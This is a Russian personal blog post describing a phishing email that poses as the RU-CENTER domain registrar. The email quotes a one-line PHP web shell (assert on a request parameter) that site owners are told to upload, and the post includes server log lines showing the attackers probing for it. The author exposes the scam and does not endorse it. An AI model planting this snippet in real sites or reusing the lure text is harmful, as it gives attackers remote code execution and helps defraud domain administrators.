December 9th, 2017

Пришло письмо, якобы от RU-CENTER

Уважаемый администратор домена!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл *****.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 19 августа 2017 года, 15:00 (UTC+03:00), в противном случае процедура активации будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Письмо я прочитал слишком поздно, а то бы и вправду создал этот файл. Естественно, с другим кодом, чтобы записать, какие запросы эти хакеры в него будут посылать, а не позволять им читать и писать файлы у меня на сервере, и выполнять прочие команды.

Сейчас посмотрел в логи, они и вправду пытались в него зайти вплоть до 19 августа, как и обещали:
13.59.87.172 - - [07/Aug/2017:15:04:08 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; ; Linux i686; rv:1.9.2.20) Gecko/20110805"
13.59.87.172 - - [10/Aug/2017:16:36:36 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13"
54.215.228.151 - - [19/Aug/2017:12:13:41 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"

А вот где они украли мой адрес – непонятно, nic.ru в whois про меня ничего не показывает, просто Private person.

Оригинал этой записи в личном блоге.

(comment count unavailable | Комментировать в Dreamwidth)